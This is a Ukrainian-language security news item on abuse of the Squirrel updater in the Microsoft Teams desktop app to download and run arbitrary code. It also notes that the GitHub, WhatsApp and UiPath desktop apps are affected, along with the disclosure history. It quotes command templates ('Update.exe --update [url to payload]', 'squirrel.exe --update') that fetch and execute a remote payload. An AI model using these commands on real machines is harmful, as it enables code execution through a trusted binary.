Microsoft Teams дозволяє завантажувати і виконувати шкідливі файли

10:15
Microsoft Teams дозволяє завантажувати і виконувати шкідливі файли

   Поточна реалізація механізму поновлення в додатку для настільних комп'ютерів Microsoft Teams дозволяє завантажувати в систему і виконувати довільні файли. Проблема також зачіпає десктопне ПЗ GitHub, WhatApp і UiPath, але дозволяє тільки завантажувати корисне навантаження.

    Для управління процесами інсталяції та оновлення перераховані вище додатки використовують проект з відкритим вихідним кодом Squirrel, який в свою чергу використовує менеджер пакетів NuGet для завантаження необхідних файлів. Як виявили дослідники безпеки, за допомогою команди 'update' в уразливих додатках можна завантажити і виконати код в контексті поточного користувача. Те ж саме стосується 'squirrel.exe'.
     У випадку з Microsoft Teams корисне навантаження додається в папку програми та виконується автоматично за допомогою команд Update.exe --update [url to payload] або squirrel.exe --update [url to payload]. Дані команди можна використовувати з іншим аргументом, в тому числі 'download', що дозволяє витягувати віддалене корисне навантаження у вигляді пакету NuGet. Спосіб працює також для 'squirrel.exe', що є частиною установчого пакета Microsoft Teams.
     Дослідник безпеки Ріган Річард (Reegun Richard) повідомив Microsoft про проблему 4 червня нинішнього року. В даний час десктопні програми Microsoft Teams як і раніше вразливі, оскільки виправлення з'явиться тільки в майбутніх релізах. До виходу патча Річард НЕ буде розкривати подробиці проблеми. Проте, дослідник з RingZer0 Team під псевдонімом Mr. Un1k0d3r також виявив проблему і опублікував подробиці.

Комментарии 0

Предпросмотр
Завантаження...
Будьте первым, кто оставит комментарий.